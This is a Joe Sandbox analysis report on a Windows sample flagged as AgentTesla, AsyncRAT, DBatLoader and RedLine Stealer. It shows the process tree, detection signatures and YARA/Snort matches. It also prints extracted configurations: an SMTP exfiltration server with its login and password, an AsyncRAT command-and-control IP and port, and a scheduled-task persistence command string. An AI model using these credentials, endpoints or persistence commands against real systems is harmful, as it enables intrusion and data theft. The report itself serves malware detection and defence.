Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PCMNil7wkU.exe

Overview

General Information

Sample name:PCMNil7wkU.exe
renamed because original name is a hash value
Original sample name:344c9c0f72c535e334a4b605212c69d9.exe
Analysis ID:1379527
MD5:344c9c0f72c535e334a4b605212c69d9
SHA1:952e1b506659a4113b2eb0857dbb86ee08e043a5
SHA256:5664820279aa20d408c82998bff07ab34c0986124b09e9ef2025c73686c77f4f
Tags:exeHUNModiLoader
Infos:

Detection

AgentTesla, AsyncRAT, DBatLoader, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AsyncRAT
Yara detected DBatLoader
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PCMNil7wkU.exe (PID: 4332 cmdline: C:\Users\user\Desktop\PCMNil7wkU.exe MD5: 344C9C0F72C535E334A4B605212C69D9)
    • cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AkaelkovO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vokleakA.pif (PID: 3716 cmdline: C:\Users\Public\Libraries\vokleakA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Akaelkov.PIF (PID: 2504 cmdline: "C:\Users\Public\Libraries\Akaelkov.PIF" MD5: 344C9C0F72C535E334A4B605212C69D9)
    • vokleakA.pif (PID: 6096 cmdline: C:\Users\Public\Libraries\vokleakA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Akaelkov.PIF (PID: 5616 cmdline: "C:\Users\Public\Libraries\Akaelkov.PIF" MD5: 344C9C0F72C535E334A4B605212C69D9)
    • vokleakA.pif (PID: 2072 cmdline: C:\Users\Public\Libraries\vokleakA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}
{"Ports": ["2017"], "Server": ["139.84.229.159"], "Mutex": "jhT6lZT93vW5", "Certificate": "MIIE8jCCAtqgAwIBAgIQAN/vhz0nNn3o7T4qYMdf5TANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMTIwMDc0NTQxWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKPPaC+bexLNgYSa0NaH9Mas6Ou1FeJxZDQs1XPqMlqBb4BLKoRgzV3Z82q8tEvHr6A/Csxa280BBC5nf2ja3uOH8VUPNfp3lOyZC1QRuYCBQxPqGpXUr6nel/tUWCAwfWSqurDw2DdMu/5Ndp85oMxZm0G1KbrJG7gVrTbq0Y3zkQew6yObf5c50xLj73NYa5ku7IS19xTHC4XM63vQiDH8cJ0DzDIt0J05qHOBUkX2xIMndVbx+fOEMsxJybe8xR12vw2MHuZliUjeBNBJN9GCvMjBgNz9mjZNj9BUgTlKO9siur+46Ouy4GhvJxqenLpSN9geEmbSzHJnNkjyPbsjj+4h0PAxtifWYlkcZlWAKu0zkq1lqZ1rMB6ojlu3VOC/6JLi5eiFei2g6IGXniGEGe0ZczXhwtxJ5TSp0EECaMiPXI6IJdOh4AyAk04CkzMxUEWbN4/nxgpCzjKhf3XiU0GA4jVKMsCmxCaInTbxJMb90NumMmBAeW+ProvQSQPK1EC1CwJ8CS6yAsG30LOCp2dYWFfiBfH1sKOtUQECaHRje3W0Bp8QP6WUuoAEs2WxY4adHP8gayXXy97fjm+UikzsghlRmmGff6Osu5bWAsuipS3JxDdW9b0to1BeYB3QDGl3b/ay2MNEMNYcX36LF8rHxTRrvJoXzLEOyUNdAgMBAAGjMjAwMB0GA1UdDgQWBBQaTinJBsSVCYrN1fxnyZFNbQGpDTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCGloMi9BEkVs4W9D/6Ma2u+1ThujGbyOCbcsWJOsnZfefykICVbdmQVBzaF8LKAAVXRs2kQvkmYA63llhWXcos3meeJFLsVFHN3x7n8Ec61ukHN6WzctLldLsw9RIlckqHvKLLEaCQtFFb1c4fVDa7Ux8YSS89hxb5iYUFSphdMyc2UCRyQE61+Wu+oaFxFKZ7JQdAQ9Kqz5NAfbeL+CqBr1HXdMtGINjVzlG/BfIkYsGWfJ8tk9Y4IOVuEOY1QoY7WpSF3Avk0joZgcAxy+FwBW4B1ID/B2iLGis5dyG5xEfhMam+0Ix+4Q3br93dqt7t/4s5Ox7g5jwyX7RyjzctvFkzaUQ4Y0ZNy/H1x+GoJfU+YTkx6mVofXOTGvmgPX7dVfhS9TnaMjJc+HdXjtuVxhn+cs/Zawyt8Aa7tNkNAA72peOiEvLeWhyQ8Mwv8LMSngC/9w55VezQ9N+MymQ35FC+He4/GPJPCLaC/ga4UG55Fs+kWOzTHxlqzyg72p9XB3IvOHKRPpYn1GH/VYILAOM4uesDkhCpvA2GgCgU9ij/y0/iLKw4LKoSA8GfoiHYn2H1xOJmrWdksJ+YbhAv1jMNpkaUaM8Bpz1ZsOc9dLjd4ts6XFQWBmyRS8Y3gGt/g8Wd+9CzkA6ux/H5jKN4p1el/StAuo2HdbHB07hbsg==", "Server Signature": "XUTz466BGLmG3TcX/C8jLjM1YgeZtXHkWl5foU/hXe7DRq1mTfSGh9lFLUrju0GdFDv9ryfbNyDz7IrKjDX7ScKOSitrpHbj9cFexQC5zpemX62SxcgOCfQTEXAv4IjoEtCjto+taoDkmbmFUivmpW91DUQm06Wnsdzy4luVJT4QCtxSlhL6sVo0Ch0Z0lz+RBUOn7ibniGGu8rKfkE8V/0dlpwM2ZObh5F0n3n+nZ8Q/nVrmGtMs7DoSYe2Co2X4Co4vfZZE4AjUOZYxZI8rFhuSTX213lrUigfM9uWMzcQoD8KRUruTLZJxw/9DLapRe28CSM1RFUOvLk6fsOTVbfoC2Ucb+5uHfuXBIMO9smcWvxw0aG2Qda8Ev/nPx9FCdctcdYZQtamjTBQU2YYIicPPZGtClXcVgL9WLqWNqmKN3shlf8VXfjajEdF3F6QYZp4HIi20jQVsDNXHfvNwPD7Z25d1jBTF39h3UlbX2Mgorb+Eoxrlpq1jokANTzr3BugvCvrjicUSru5nMRUGorVDNkcHE+SOQR/se51eCw+6ebD6MzqzSPjHqc5x4ci5hKwRsw8LjUZyGJxrNybkZ+PgHwsSIo/md1+YeVjsSc8y527gn4wRJ1t+2Crnr0bPth03HwMCa1KMRFRT6eWaqy6e3h2PXRGQ+K2ASFuUWU="}
SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xcbb29:$x1: AsyncRAT
  • 0xcbb67:$x1: AsyncRAT
SourceRuleDescriptionAuthorStrings
00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x1300:$s3: 83 EC 38 53 B0 E6 88 44 24 2B 88 44 24 2F B0 CA 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1fdd0:$s5: delete[]
      • 0x1f288:$s6: constructor or from DllMain.
      00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        Click to see the 129 entries
        SourceRuleDescriptionAuthorStrings
        7.2.vokleakA.pif.284a0000.7.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          7.2.vokleakA.pif.284a0000.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            7.2.vokleakA.pif.284a0000.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              7.2.vokleakA.pif.284a0000.7.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
              • 0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
              • 0x55120:$a2: Stub.exe
              • 0x551b0:$a2: Stub.exe
              • 0x3d9b4:$a3: get_ActivatePong
              • 0x4694f:$a4: vmware
              • 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
              • 0x3d8d9:$a6: get_SslClient
              7.2.vokleakA.pif.284a0000.7.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
              • 0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
              Click to see the 358 entries
              No Sigma rule has matched
              Timestamp:139.84.229.159192.168.2.52017497072030673 01/23/24-14:33:00.107795
              SID:2030673
              Source Port:2017
              Destination Port:49707
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:139.84.229.159192.168.2.52017497072035595 01/23/24-14:33:00.107795
              SID:2035595
              Source Port:2017
              Destination Port:49707
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Ports": ["2017"], "Server": ["139.84.229.159"], "Mutex": "jhT6lZT93vW5", "Certificate": "MIIE8jCCAtqgAwIBAgIQAN/vhz0nNn3o7T4qYMdf5TANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMTIwMDc0NTQxWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKPPaC+bexLNgYSa0NaH9Mas6Ou1FeJxZDQs1XPqMlqBb4BLKoRgzV3Z82q8tEvHr6A/Csxa280BBC5nf2ja3uOH8VUPNfp3lOyZC1QRuYCBQxPqGpXUr6nel/tUWCAwfWSqurDw2DdMu/5Ndp85oMxZm0G1KbrJG7gVrTbq0Y3zkQew6yObf5c50xLj73NYa5ku7IS19xTHC4XM63vQiDH8cJ0DzDIt0J05qHOBUkX2xIMndVbx+fOEMsxJybe8xR12vw2MHuZliUjeBNBJN9GCvMjBgNz9mjZNj9BUgTlKO9siur+46Ouy4GhvJxqenLpSN9geEmbSzHJnNkjyPbsjj+4h0PAxtifWYlkcZlWAKu0zkq1lqZ1rMB6ojlu3VOC/6JLi5eiFei2g6IGXniGEGe0ZczXhwtxJ5TSp0EECaMiPXI6IJdOh4AyAk04CkzMxUEWbN4/nxgpCzjKhf3XiU0GA4jVKMsCmxCaInTbxJMb90NumMmBAeW+ProvQSQPK1EC1CwJ8CS6yAsG30LOCp2dYWFfiBfH1sKOtUQECaHRje3W0Bp8QP6WUuoAEs2WxY4adHP8gayXXy97fjm+UikzsghlRmmGff6Osu5bWAsuipS3JxDdW9b0to1BeYB3QDGl3b/ay2MNEMNYcX36LF8rHxTRrvJoXzLEOyUNdAgMBAAGjMjAwMB0GA1UdDgQWBBQaTinJBsSVCYrN1fxnyZFNbQGpDTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCGloMi9BEkVs4W9D/6Ma2u+1ThujGbyOCbcsWJOsnZfefykICVbdmQVBzaF8LKAAVXRs2kQvkmYA63llhWXcos3meeJFLsVFHN3x7n8Ec61ukHN6WzctLldLsw9RIlckqHvKLLEaCQtFFb1c4fVDa7Ux8YSS89hxb5iYUFSphdMyc2UCRyQE61+Wu+oaFxFKZ7JQdAQ9Kqz5NAfbeL+CqBr1HXdMtGINjVzlG/BfIkYsGWfJ8tk9Y4IOVuEOY1QoY7WpSF3Avk0joZgcAxy+FwBW4B1ID/B2iLGis5dyG5xEfhMam+0Ix+4Q3br93dqt7t/4s5Ox7g5jwyX7RyjzctvFkzaUQ4Y0ZNy/H1x+GoJfU+YTkx6mVofXOTGvmgPX7dVfhS9TnaMjJc+HdXjtuVxhn+cs/Zawyt8Aa7tNkNAA72peOiEvLeWhyQ8Mwv8LMSngC/9w55VezQ9N+MymQ35FC+He4/GPJPCLaC/ga4UG55Fs+kWOzTHxlqzyg72p9XB3IvOHKRPpYn1GH/VYILAOM4uesDkhCpvA2GgCgU9ij/y0/iLKw4LKoSA8GfoiHYn2H1xOJmrWdksJ+YbhAv1jMNpkaUaM8Bpz1ZsOc9dLjd4ts6XFQWBmyRS8Y3gGt/g8Wd+9CzkA6ux/H5jKN4p1el/StAuo2HdbHB07hbsg==", "Server Signature": "XUTz466BGLmG3TcX/C8jLjM1YgeZtXHkWl5foU/hXe7DRq1mTfSGh9lFLUrju0GdFDv9ryfbNyDz7IrKjDX7ScKOSitrpHbj9cFexQC5zpemX62SxcgOCfQTEXAv4IjoEtCjto+taoDkmbmFUivmpW91DUQm06Wnsdzy4luVJT4QCtxSlhL6sVo0Ch0Z0lz+RBUOn7ibniGGu8rKfkE8V/0dlpwM2ZObh5F0n3n+nZ8Q/nVrmGtMs7DoSYe2Co2X4Co4vfZZE4AjUOZYxZI8rFhuSTX213lrUigfM9uWMzcQoD8KRUruTLZJxw/9DLapRe28CSM1RFUOvLk6fsOTVbfoC2Ucb+5uHfuXBIMO9smcWvxw0aG2Qda8Ev/nPx9FCdctcdYZQtamjTBQU2YYIicPPZGtClXcVgL9WLqWNqmKN3shlf8VXfjajEdF3F6QYZp4HIi20jQVsDNXHfvNwPD7Z25d1jBTF39h3UlbX2Mgorb+Eoxrlpq1jokANTzr3BugvCvrjicUSru5nMRUGorVDNkcHE+SOQR/se51eCw+6ebD6MzqzSPjHqc5x4ci5hKwRsw8LjUZyGJxrNybkZ+PgHwsSIo/md1+YeVjsSc8y527gn4wRJ1t+2Crnr0bPth03HwMCa1KMRFRT6eWaqy6e3h2PXRGQ+K2ASFuUWU="}
              Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}
              Source: C:\Users\Public\Libraries\Akaelkov.PIFReversingLabs: Detection: 26%
              Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 65%
              Source: PCMNil7wkU.exeReversingLabs: Detection: 26%
              Source: C:\Users\Public\Libraries\netutils.dllJoe Sandbox ML: detected

              Compliance

              barindex
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 4.2.vokleakA.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 7.2.vokleakA.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\vokleakA.pifUnpacked PE file: 9.2.vokleakA.pif.400000.0.unpack
              Source: PCMNil7wkU.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr
              Source: Binary string: easinvoker.pdb source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: Binary string: _.pdb source: vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2155090535.00000000243C6000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218197846.000000002439D000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280708634.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280042315.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2318435848.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279905778.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2281099206.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2279726385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280484770.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2247149385.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2280249711.000000002FF94000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbH source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04105C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_04105C18

              Networking

              barindex
              Source: TrafficSnort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 139.84.229.159:2017 -> 192.168.2.5:49707
              Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 139.84.229.159:2017 -> 192.168.2.5:49707
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
